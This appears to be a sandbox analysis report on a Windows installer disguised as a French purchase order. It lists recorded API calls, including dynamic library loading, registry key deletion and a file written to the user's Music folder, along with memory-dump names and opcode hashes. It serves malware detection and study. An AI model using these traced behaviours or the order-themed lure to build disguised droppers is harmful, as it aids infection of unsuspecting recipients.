                                                        • Opcode ID: 74fb76eeeede5a40a20a2361ef673ad81c0513ff9195b193d02cf5d9451a49b8
                                                        • Instruction ID: 2b7602dd897122490efce7636127cf141f752ce9b4a01bbcaa67e469b6673d4c
                                                        • Opcode Fuzzy Hash: 74fb76eeeede5a40a20a2361ef673ad81c0513ff9195b193d02cf5d9451a49b8
                                                        • Instruction Fuzzy Hash: 1C01C4B094A214ABE721AF60AF0DEAE776CBB01701B144137F501B12E1C2B8E941C69E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048AF
                                                        • GetMessagePos.USER32 ref: 004048B7
                                                        • ScreenToClient.USER32(?,?), ref: 004048D1
                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 004048E3
                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404909
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                        • Instruction ID: 496b0d989960c3cf29f9699654413807f08c541ba74c601a1343b1cc24abed90
                                                        • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                        • Instruction Fuzzy Hash: A9015275D00219BAEB11DBA4DC45FFFBBBCAF55711F10412BBA10B61C0C7B4A5418BA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
                                                        • wsprintfA.USER32 ref: 00402B91
                                                        • SetWindowTextA.USER32(?,?), ref: 00402BA1
                                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                        • API String ID: 1451636040-1158693248
                                                        • Opcode ID: eb69263b85c0967037015140e31ace042ee7bd246636b1be7c2271423c491acf
                                                        • Instruction ID: 1e30126d7328232efec95edeb0659339e9715d7a4c2dcddc2072aaf334070cd4
                                                        • Opcode Fuzzy Hash: eb69263b85c0967037015140e31ace042ee7bd246636b1be7c2271423c491acf
                                                        • Instruction Fuzzy Hash: EBF01270900108BBDF215F61CD0ABEE3779EB10345F00803AFA06B51D0D7F8AA558B99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • lstrlenA.KERNEL32(Stedtillgs Setup: Completed,Stedtillgs Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046D2,000000DF,0000040F,00000400,00000000), ref: 00404840
                                                        • wsprintfA.USER32 ref: 00404848
                                                        • SetDlgItemTextA.USER32(?,Stedtillgs Setup: Completed), ref: 0040485B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s$Stedtillgs Setup: Completed
                                                        • API String ID: 3540041739-1690554567
                                                        • Opcode ID: f043f7f958de03c1dfbf7371bdda6b63f5028b7502eadd070cc116c886b6bfad
                                                        • Instruction ID: ac025ec359353314cc5270af0c4b085ff7d14dcca326c3d749765100b4f994c7
                                                        • Opcode Fuzzy Hash: f043f7f958de03c1dfbf7371bdda6b63f5028b7502eadd070cc116c886b6bfad
                                                        • Instruction Fuzzy Hash: 2F11E27360012437DB00626D9C4AFEF3659DBC2334F24423BFA29B71D1E9789C6282E9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F93
                                                          • Part of subcall function 00404FC9: lstrlenA.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405002
                                                          • Part of subcall function 00404FC9: lstrlenA.KERNEL32(00402C51,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405012
                                                          • Part of subcall function 00404FC9: lstrcatA.KERNEL32(Completed,00402C51,00402C51,Completed,00000000,00000000,00000000), ref: 00405025
                                                          • Part of subcall function 00404FC9: SetWindowTextA.USER32(Completed,Completed), ref: 00405037
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505D
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405077
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405085
                                                        • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                        • String ID: `7B
                                                        • API String ID: 2987980305-3208876730
                                                        • Opcode ID: b1fd6d595788f4215f5bd3486e282a6884663c05417798ea4a9ed00f5c5b9fb3
                                                        • Instruction ID: f6a91bdf01fdb4a856c4cb7ab8675b48806981152caa269ce110007ec06e39c8
                                                        • Opcode Fuzzy Hash: b1fd6d595788f4215f5bd3486e282a6884663c05417798ea4a9ed00f5c5b9fb3
                                                        • Instruction Fuzzy Hash: 3321D872904215F6CF107FA4CE4DA6E79B0AB44358F60823BF601B62D0DBBD4941DA5E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A5E
                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402AA3
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402AC8
                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Close$DeleteEnumOpen
                                                        • String ID:
                                                        • API String ID: 1912718029-0
                                                        • Opcode ID: 4b25ae56376b3f1221da29a59a5e0d01808cbf612e92f5f00375b302b45f37be
                                                        • Instruction ID: 6a9a95a3d1c289ebb6cdea9d4b31099183be5c714bdf59020cec6d7c6c818ba9
                                                        • Opcode Fuzzy Hash: 4b25ae56376b3f1221da29a59a5e0d01808cbf612e92f5f00375b302b45f37be
                                                        • Instruction Fuzzy Hash: 27114C71A00108FFDF21AF90DE49DAA3B7DEB54349F104136FA06B10A0DBB49E51AF69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDlgItem.USER32(?), ref: 00401CD0
                                                        • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                                        • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                                        • DeleteObject.GDI32(00000000), ref: 00401D1B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        • Opcode ID: 0996fb78d6c1f481d5f30590086a3f444e47b09fbafeabaac561346a7c7ab868
                                                        • Instruction ID: f51ac8410cbf6ce335f498807c5bd2b5625ae864585cec2d5bc31dfd5d98a64c
                                                        • Opcode Fuzzy Hash: 0996fb78d6c1f481d5f30590086a3f444e47b09fbafeabaac561346a7c7ab868
                                                        • Instruction Fuzzy Hash: 6DF012B2A05115BFE701EBA4EE89DAF77BCEB44301B109576F501F2191C7789D018B79
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDC.USER32(?), ref: 00401D29
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                        • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                                        • CreateFontIndirectA.GDI32(0040A7B8), ref: 00401DA1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                        • String ID:
                                                        • API String ID: 3808545654-0
                                                        • Opcode ID: 6db521c7c502fe74efbec2512e91b531a8c8ce959b0fac9aafa0bb78a36e2a65
                                                        • Instruction ID: 060246e538297e9e1c784849604c8f7f1088759f99002d8560b965ebc89bd25b
                                                        • Opcode Fuzzy Hash: 6db521c7c502fe74efbec2512e91b531a8c8ce959b0fac9aafa0bb78a36e2a65
                                                        • Instruction Fuzzy Hash: 43018671958340AFEB015BB0AE0EB9E3FB4EB15705F208439F141B72E2C57854159B2F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00405774
                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 0040577D
                                                        • lstrcatA.KERNEL32(?,00409014), ref: 0040578E
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040576E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 2659869361-3936084776
                                                        • Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                        • Instruction ID: 1a6830d2c1c169c874c5ca2981f80c8a3f1a40f12e9be47e1b60bd4f3e9b1918
                                                        • Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                        • Instruction Fuzzy Hash: 9BD0A9A2609A306AE20222199C05E8F6A08CF02300B040032F605B62A2C63C0E429BFE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                                        • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                                        • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                                          • Part of subcall function 00405C3C: wsprintfA.USER32 ref: 00405C49
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                        • String ID:
                                                        • API String ID: 1404258612-0
                                                        • Opcode ID: aa5a956563f94264f8986a84426553d578cf2b3af7288d740c55cc0e7e4e042a
                                                        • Instruction ID: b3fcdbc9dd76458da788cdf58b6f95538f5ce151b2f15d12b0a955ad6fee60ce
                                                        • Opcode Fuzzy Hash: aa5a956563f94264f8986a84426553d578cf2b3af7288d740c55cc0e7e4e042a
                                                        • Instruction Fuzzy Hash: F31173B1900218BEDB01EFA5DD41D9EBBB9EF04344F10807AF505F61A1E7389E54DB28
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00404F6C
                                                        • CallWindowProcA.USER32(?,?,?,?), ref: 00404FBD
                                                          • Part of subcall function 00404018: SendMessageA.USER32(000103F2,00000000,00000000,00000000), ref: 0040402A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID:
                                                        • API String ID: 3748168415-3916222277
                                                        • Opcode ID: 5743c3f0d91b1bdb44f496c729a81979d009a58dbf752086bda617ff77998d14
                                                        • Instruction ID: afe80570641b081ecec8a2a4254b7c73db9dd8a02ece8fbff1c9a9ba965e2ecd
                                                        • Opcode Fuzzy Hash: 5743c3f0d91b1bdb44f496c729a81979d009a58dbf752086bda617ff77998d14
                                                        • Instruction Fuzzy Hash: EB0175F110424AAFDF209F51DD81A9B3725E7C4750F144037FB007A2D1D7798C62AB69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,00000011), ref: 004024EF
                                                        • WriteFile.KERNEL32(00000000,?,C:\Users\user\Music\magmaen.Pre,00000000,?,?,00000000,00000011), ref: 0040250E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: FileWritelstrlen
                                                        • String ID: C:\Users\user\Music\magmaen.Pre
                                                        • API String ID: 427699356-1368223089
                                                        • Opcode ID: 6488bc6fcfbc3cae407dbb1a421d1427c85d733e782842b39ab670187b505b31
                                                        • Instruction ID: ec6543fef349a6256ae9c0be30bf33b46acbb68c9f58cc1a2edee276f495746f
                                                        • Opcode Fuzzy Hash: 6488bc6fcfbc3cae407dbb1a421d1427c85d733e782842b39ab670187b505b31
                                                        • Instruction Fuzzy Hash: 71F089B2A14244BFEB40EBA49E49AAB7768DB40304F10443BB142F61C2D6FC4941EB6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76232EE0,004036A9,76233410,004034D6,?), ref: 004036EC
                                                        • GlobalFree.KERNEL32(00000000), ref: 004036F3
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004036E4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Free$GlobalLibrary
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 1100898210-3936084776
                                                        • Opcode ID: 46109c7d5e8f7901f06fb38b4e0fa0f424bccadd35d86ca9fbc9df7497a0603c
                                                        • Instruction ID: d9d7596a2fa150d819e6a74e3d7b6637a3ae96b25f0f67a325cd61ef5fdce0bc
                                                        • Opcode Fuzzy Hash: 46109c7d5e8f7901f06fb38b4e0fa0f424bccadd35d86ca9fbc9df7497a0603c
                                                        • Instruction Fuzzy Hash: 98E08C32801020ABC6215F65AD0475ABB687F88B22F06082AE8007B3A09BB66C815AC9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,80000000,00000003), ref: 004057BB
                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,80000000,00000003), ref: 004057C9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrlen
                                                        • String ID: C:\Users\user\Desktop
                                                        • API String ID: 2709904686-3125694417
                                                        • Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                        • Instruction ID: 707dbef540ece1ff312b000549851e46262dd825b0763663a0da280226ece44d
                                                        • Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                        • Instruction Fuzzy Hash: A4D0A76241CE705EF30352149C00B8F6A58CF12700F090462E180A7591C27C0D414BBE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
